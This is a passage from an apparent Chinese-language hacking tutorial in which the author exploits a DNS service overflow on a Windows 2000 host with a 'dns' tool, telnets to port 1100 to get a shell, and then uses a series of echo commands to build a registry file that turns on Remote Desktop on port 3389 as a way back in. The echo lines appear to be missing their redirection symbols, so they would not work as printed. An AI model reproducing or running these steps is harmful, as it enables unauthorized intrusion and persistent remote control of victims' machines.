在CMD下运行它可以看到它的使用参数等信息。执行dns -s IP命令检测目标IP是否存在DNS溢出漏洞。在图中我们可以看出目标主机存在DNS溢出漏洞,操作系统为Windows 2000!接着我们进行溢出攻击,执行dns -t 2000all IP 1207后提示要我们检测返回的1100端口的shell。telnet IP 1100成功得到返回的cmdshell,如图3。注意目录为c:\WINNT\system32,顶部也明显可以看到Windows 2000相关字样。接着我们需要做的是使用echo命令写入一个3389.reg注册表文件。将如下代码一行一行地复制到cmdshell窗口后按回车执行:
echo Windows Registry Editor Version 5.00 3389.reg
echo. 3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] 3389.reg
echo Enabled=0 3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 3389.reg
echo ShutdownWithoutLogon=0 3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 3389.reg
echo EnableAdminTSRemote=dword:00000001 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 3389.reg
echo TSEnabled=dword:00000001 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 3389.reg
echo Start=dword:00000002 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 3389.reg
echo Start=dword:00000002 3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] 3389.reg
echo Hotkey=1 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 3389.reg
echo PortNumber=dword:00000D3D 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 3389.reg
echo PortNumber=dword:00000D3D 3389.reg
取消
评论